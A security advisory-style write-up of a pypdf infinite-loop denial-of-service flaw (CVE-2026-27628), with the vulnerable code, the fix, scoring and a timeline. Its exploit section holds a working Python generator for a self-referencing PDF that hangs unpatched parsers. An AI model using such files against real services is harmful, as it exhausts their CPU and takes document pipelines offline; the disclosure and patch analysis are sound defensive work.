CVE-2026-27628

The Ouroboros Document: Infinite Loops in pypdf

Alon Barad

Software Engineer

Feb 25, 2026 · 5 min read

Executive Summary (TL;DR)

pypdf < 6.7.2 fails to track visited offsets when parsing PDF cross-reference tables. A malicious PDF whose `/Prev` chain leads back to an already-visited xref offset creates an infinite loop, pinning a CPU core until the process is killed.

A high-severity Denial of Service (DoS) vulnerability exists in `pypdf`, a ubiquitous library for PDF manipulation in the Python ecosystem. By crafting a PDF with a circular cross-reference (xref) chain, an attacker can trap the parser in an infinite loop. The result is immediate 100% utilization of a CPU core and a hung process, which can take down document processing pipelines, web services, or serverless functions.


The Hook: Parsing the Unparsable

PDFs are not documents; they are containers of sorrow. The PDF specification is a sprawling, decades-old beast that supports features most people have never heard of, including incremental updates. When you edit a PDF, the software doesn't necessarily rewrite the whole file. Instead, it appends a new 'body' to the end, containing the changed objects and a new 'cross-reference' (xref) section.

To read the file, a parser starts at the end, where the `startxref` keyword records the byte offset of the newest xref section, and works its way backward, following pointers to previous versions of the document. This is handled by the /Prev key in the trailer dictionary, which points to the byte offset of the previous xref table.
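To make that starting point concrete, here is a minimal sketch of the first two things a parser does with the classic (non-stream) file layout: read the offset after the last `startxref` keyword, then pull `/Prev` out of the last trailer. The function names and the 1024-byte search window are assumptions for illustration, not pypdf's API. Files that use cross-reference streams (PDF 1.5+) have no `trailer` keyword, so `find_last_prev` simply returns `None` for them.

```python
import re
from typing import Optional

# Matches "/Prev <integer>" inside a trailer dictionary.
_PREV_RE = re.compile(rb"/Prev\s+(\d+)")


def find_startxref(data: bytes, window: int = 1024) -> int:
    """Return the offset written after the last 'startxref' keyword.

    Only the final `window` bytes are searched; the window size is an
    illustrative assumption.
    """
    tail = data[-window:]
    idx = tail.rfind(b"startxref")
    if idx == -1:
        raise ValueError("no 'startxref' keyword near the end of the file")
    tokens = tail[idx + len(b"startxref"):].split()
    if not tokens:
        raise ValueError("'startxref' is not followed by an offset")
    return int(tokens[0])


def find_last_prev(data: bytes) -> Optional[int]:
    """Return the /Prev offset from the last classic trailer, or None."""
    idx = data.rfind(b"trailer")
    if idx == -1:
        return None  # e.g. files that rely on cross-reference streams
    match = _PREV_RE.search(data, idx)
    return int(match.group(1)) if match else None


# A trailer like the one shown in the exploit section:
sample = b"trailer\n<< /Size 10 /Root 1 0 R /Prev 400 >>\nstartxref\n1000\n%%EOF\n"
print(find_startxref(sample))  # 1000
print(find_last_prev(sample))  # 400
```

The parser then seeks to 1000, reads that table, and moves on to 400; every later hop repeats the same "read /Prev, seek" step.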

pypdf, one of the most popular Python libraries for handling PDFs, is tasked with traversing this chain to build a complete map of the document. It’s a standard linked-list traversal problem. But as any computer science freshman knows, if you traverse a linked list without checking for cycles, you are one bad pointer away from eternity. That is exactly what happened here.

The Flaw: Trusting the Trail

The vulnerability lies in the _read_xref_tables_and_trailers method within pypdf/_reader.py. This function is responsible for reconstructing the document structure by hopping from the most recent xref table to the oldest one via the /Prev key.

The logic was deceptively simple: start at the startxref offset, parse the table, look for a /Prev key, update startxref to that new value, and repeat until startxref is None. It looks standard, but it lacks a critical defensive programming concept: distrust.

The code blindly assumed that the chain of /Prev pointers would eventually terminate, or at least move steadily backward through the file. It did not account for a malicious PDF where the xref section at offset 1000 has a trailer whose /Prev points to offset 500, whose trailer in turn points back to offset 1000. Once the parser enters this loop, it spins forever, repeatedly re-parsing and re-caching the same objects and consuming 100% of a CPU core until the process is killed or the universe ends.
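The failure mode can be reproduced without any PDF at all. In this toy model (an assumption for illustration, not pypdf code), a dictionary maps each xref offset to the /Prev value its trailer would yield, standing in for "seek, parse, read /Prev". The walk mirrors the vulnerable loop, but adds a hypothetical `max_steps` budget so that the demonstration itself terminates.

```python
from typing import Dict, List, Optional


def naive_walk(
    prev_of: Dict[int, Optional[int]], startxref: int, max_steps: int = 10
) -> List[int]:
    """Follow /Prev links the way the vulnerable loop does.

    The real loop has no `max_steps`; it exists here only so that this
    demonstration returns instead of spinning forever.
    """
    order: List[int] = []
    current: Optional[int] = startxref
    while current is not None and len(order) < max_steps:
        order.append(current)
        # A missing offset behaves like a trailer without /Prev: the chain ends.
        current = prev_of.get(current)
    return order


healthy = {1000: 500, 500: None}    # newest table -> older table -> end
ouroboros = {1000: 500, 500: 1000}  # 1000 -> 500 -> 1000 -> ...

print(naive_walk(healthy, 1000))                 # [1000, 500]
print(naive_walk(ouroboros, 1000, max_steps=6))  # [1000, 500, 1000, 500, 1000, 500]
```

In the healthy chain the loop exits because /Prev eventually runs out; in the circular one only the artificial budget stops it, which is exactly the exit condition the vulnerable code lacks.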

The Code: The Smoking Gun

Let's look at the vulnerable code. It's a textbook example of an infinite loop waiting to happen. The variable startxref is the control condition, but there is no history of where we've been.

```python
# Vulnerable implementation in pypdf/_reader.py (excerpt)

def _read_xref_tables_and_trailers(self, stream, startxref):
    # ... initialization ...
    while startxref is not None:
        # The parser seeks to the offset blindly
        stream.seek(startxref, 0)

        # ... complex parsing logic (produces `trailer`) ...

        # The parser reads the next link in the chain.
        # If this points to an offset we have already visited, we are doomed.
        startxref = trailer.get("/Prev")
```

The fix, introduced in version 6.7.2, is elegant and standard: keep a set of visited offsets. If we see an offset again, we know we are in a loop, and we bail out.

```diff
 # Patched implementation

 def _read_xref_tables_and_trailers(self, stream, startxref):
     # ... initialization ...
+    visited_xref_offsets: set[int] = set()

     while startxref is not None:
         # Check if we've been here before
+        if startxref in visited_xref_offsets:
+            logger_warning(
+                f"Circular xref chain detected at offset {startxref}, stopping",
+                __name__,
+            )
+            break
+
+        visited_xref_offsets.add(startxref)

         stream.seek(startxref, 0)
         # ... parsing logic ...
```

This simple addition of visited_xref_offsets completely neutralizes the attack. It transforms an infinite loop into a logged warning.
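The same visited-set idea can be exercised end to end on raw bytes. The sketch below is a simplified stand-in for the patched loop, not pypdf's code: `read_prev` is a hypothetical helper that scans forward from an offset to the next `trailer` dictionary and extracts `/Prev` with regular expressions (it does not handle nested dictionaries or xref streams), and Python's standard `logging` module replaces pypdf's internal `logger_warning`.

```python
import io
import logging
import re
from typing import BinaryIO, List, Optional, Set

logger = logging.getLogger(__name__)

_TRAILER_RE = re.compile(rb"trailer\s*<<(.*?)>>", re.S)
_PREV_RE = re.compile(rb"/Prev\s+(\d+)")


def read_prev(stream: BinaryIO, offset: int) -> Optional[int]:
    """Hypothetical helper: seek to `offset`, find the next trailer, return /Prev."""
    stream.seek(offset, 0)
    trailer = _TRAILER_RE.search(stream.read())
    if trailer is None:
        return None
    prev = _PREV_RE.search(trailer.group(1))
    return int(prev.group(1)) if prev else None


def walk_xref_chain(stream: BinaryIO, startxref: Optional[int]) -> List[int]:
    """Follow /Prev links, stopping as soon as an offset repeats."""
    visited: Set[int] = set()
    order: List[int] = []
    while startxref is not None:
        if startxref in visited:
            logger.warning("Circular xref chain detected at offset %d, stopping", startxref)
            break
        visited.add(startxref)
        order.append(startxref)
        startxref = read_prev(stream, startxref)
    return order


# Two sections whose trailers point at each other. Fixed-width offsets keep
# the byte length of a section independent of the value written into it.
section = b"xref\ntrailer\n<< /Size 1 /Prev %04d >>\n"
offset_b = len(section % 0)  # 38
data = (section % offset_b) + (section % 0)

print(walk_xref_chain(io.BytesIO(data), offset_b))  # [38, 0], plus a logged warning
```

The first repeated offset ends the walk, so even a maliciously circular chain costs at most one pass over each distinct xref section.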

The Exploit: Crafting the Ouroboros

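Exploiting this is trivial if you understand raw PDF syntax. We don't need complex heap massaging or ROP chains; we just need a text editor. A PDF trailer usually looks like this:

```
trailer
<< /Size 10 /Root 1 0 R /Prev 400 >>
startxref
1000
%%EOF
```

In a valid file, `startxref 1000` points to the newest cross-reference table, and `/Prev 400` says there is an older one at byte offset 400. To exploit pypdf, we construct a file where the cross-reference table's `/Prev` points to itself, or to a second table that points back to the first.

Here is the logic flow of the attack:

1. Define a valid PDF structure (header, body, xref table).
2. Calculate the byte offset of the `xref` keyword (say it lands at offset 550).
3. In the trailer dictionary, set `/Prev 550`.
4. Point `startxref` at 550 as usual. The parser reads the table, finds `/Prev 550`, sets `startxref` to 550, and loops. And loops. And loops.

The PoC provided in the repository does exactly this, using Python string formatting to inject the calculated offsets dynamically. It creates a self-referential PDF that is syntactically valid enough to lead the parser into the loop, yet logically broken.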
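The steps above can be sketched in a few lines of Python. This is an illustrative generator written for this explanation, not the PoC from the repository, and `build_ouroboros_pdf` is a hypothetical name: it lays out a minimal three-object PDF, measures where the `xref` keyword lands, and writes that same offset into both `/Prev` and `startxref`.

```python
def build_ouroboros_pdf() -> bytes:
    """Build a minimal PDF whose only xref table names itself as /Prev."""
    objects = [
        b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n",
        b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n",
        b"3 0 obj\n<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>\nendobj\n",
    ]

    # Step 1: header and body, remembering where each object starts.
    body = bytearray(b"%PDF-1.4\n")
    offsets = []
    for obj in objects:
        offsets.append(len(body))
        body += obj

    # Step 2: the xref keyword starts right after the last object.
    xref_offset = len(body)
    xref = bytearray(b"xref\n0 %d\n" % (len(objects) + 1))
    xref += b"0000000000 65535 f \n"  # each xref entry is exactly 20 bytes
    for off in offsets:
        xref += b"%010d 00000 n \n" % off

    # Steps 3 and 4: /Prev and startxref both point back at the same table.
    # ("%%%%EOF" renders as "%%EOF" after %-formatting.)
    trailer = (
        b"trailer\n<< /Size %d /Root 1 0 R /Prev %d >>\n"
        b"startxref\n%d\n%%%%EOF\n" % (len(objects) + 1, xref_offset, xref_offset)
    )
    return bytes(body + xref + trailer)
```

Writing the result to disk, for example with `pathlib.Path("ouroboros.pdf").write_bytes(build_ouroboros_pdf())`, yields a file that, per the analysis above, should keep pypdf < 6.7.2 spinning. Only open it in a disposable environment with a hard timeout.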

The Impact: Death by Parsing

You might think, "It's just an infinite loop, who cares?" In the age of automated document processing, you should care deeply. Imagine a backend service that accepts user-uploaded resumes or invoices. This service likely spins up a worker process (or an AWS Lambda) to parse the PDF, extract text, or render a thumbnail.

If an attacker uploads a 5KB malformed PDF:

Resource Exhaustion: The worker process hits 100% CPU immediately.
Thread Starvation: If the application is synchronous (common in simple Flask/Django apps), that worker is dead. It can't handle other requests.
Bill Shock: If this is running in a serverless environment (Lambda/Cloud Run) with a high timeout (e.g., 15 minutes), you are paying for max compute for the full duration of the timeout, for every single malicious request.
DoS: Send 50 of these files concurrently, and you can lock up an entire fleet of workers with almost zero bandwidth cost.

Official Patches

GitHub: Commit 0fbd959 fixing the infinite loop


Technical Appendix

CVSS Score

7.5 / 10

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
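The 7.5 follows directly from this vector through the CVSS v3.1 base-score equations. The sketch below implements only the base metrics, using the weights and the Roundup rule defined in the CVSS v3.1 specification; the function names are illustrative.

```python
import math
from typing import Dict

# Base-metric weights from the CVSS v3.1 specification.
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.20}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.50}  # PR weights differ when Scope is Changed
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value, float-safe."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def parse_vector(vector: str) -> Dict[str, str]:
    """Split 'CVSS:3.1/AV:N/...' into {'AV': 'N', ...}."""
    prefix, *metrics = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError(f"unsupported vector prefix: {prefix!r}")
    return dict(item.split(":", 1) for item in metrics)


def base_score(vector: str) -> float:
    m = parse_vector(vector)
    changed = m["S"] == "C"
    # Impact Sub-Score (ISS) combines the confidentiality, integrity, availability impacts.
    iss = 1 - (1 - CIA[m["C"]]) * (1 - CIA[m["I"]]) * (1 - CIA[m["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[m["PR"]]
    exploitability = 8.22 * AV[m["AV"]] * AC[m["AC"]] * pr * UI[m["UI"]]
    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"))  # 7.5
```

For this vector only availability is affected, so ISS = 0.56, Impact = 6.42 × 0.56 ≈ 3.595, and Exploitability = 8.22 × 0.85 × 0.77 × 0.85 × 0.85 ≈ 3.887. Their sum, about 7.482, rounds up to 7.5.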

EPSS Probability

0.04%

Top 88% most exploited

Affected Systems

pypdf < 6.7.2

Python applications processing untrusted PDFs

Affected Versions Detail

| Product | Affected Versions | Fixed Version |
|---|---|---|
| pypdf (py-pdf) | < 6.7.2 | 6.7.2 |
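To check whether an environment falls inside the affected range, a minimal stdlib-only sketch might compare the installed release against 6.7.2. The function names are hypothetical, and the check only inspects the distribution named `pypdf`.

```python
import re
from importlib import metadata
from typing import Optional, Tuple

FIXED_RELEASE = (6, 7, 2)  # first fixed pypdf version per the table above
_RELEASE_RE = re.compile(r"\d+(?:\.\d+)*")


def parse_release(version: str) -> Tuple[int, ...]:
    """Return the leading numeric release, e.g. '6.7.2rc1' -> (6, 7, 2).

    Pre-release and dev suffixes are dropped, so '6.7.2rc1' compares as 6.7.2.
    """
    match = _RELEASE_RE.match(version)
    if match is None:
        raise ValueError(f"cannot parse version {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_vulnerable(version: str) -> bool:
    """True if `version` is older than the first fixed release."""
    return parse_release(version) < FIXED_RELEASE


def installed_pypdf_is_vulnerable() -> Optional[bool]:
    """True/False for the installed 'pypdf' distribution, None if it is absent."""
    try:
        installed = metadata.version("pypdf")
    except metadata.PackageNotFoundError:
        return None
    return is_vulnerable(installed)
```

Comparing integer tuples rather than strings keeps multi-digit components in order (6.10.0 sorts after 6.7.2). If pre-release builds matter, `packaging.version.Version` gives a more precise ordering.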

| Attribute | Detail |
|---|---|
| CWE | CWE-835 (Infinite Loop) |
| CVSS v3.1 | 7.5 (High) |
| Attack Vector | Network (via file upload) |
| Impact | Denial of Service (CPU Exhaustion) |
| Exploit Status | PoC Available |
| EPSS Score | 0.04% |

MITRE ATT&CK Mapping

T1499.003: Endpoint Denial of Service: Application Exhaustion Flood

Tactic: Impact

CWE-835: Loop with Unreachable Exit Condition ('Infinite Loop')

Known Exploits & Detection

GitHub: Original issue report containing the circular reference PoC

Vulnerability Timeline

Issue Reported on GitHub: 2026-02-21

Fix Committed: 2026-02-21

pypdf v6.7.2 Released: 2026-02-22

CVE Published: 2026-02-25
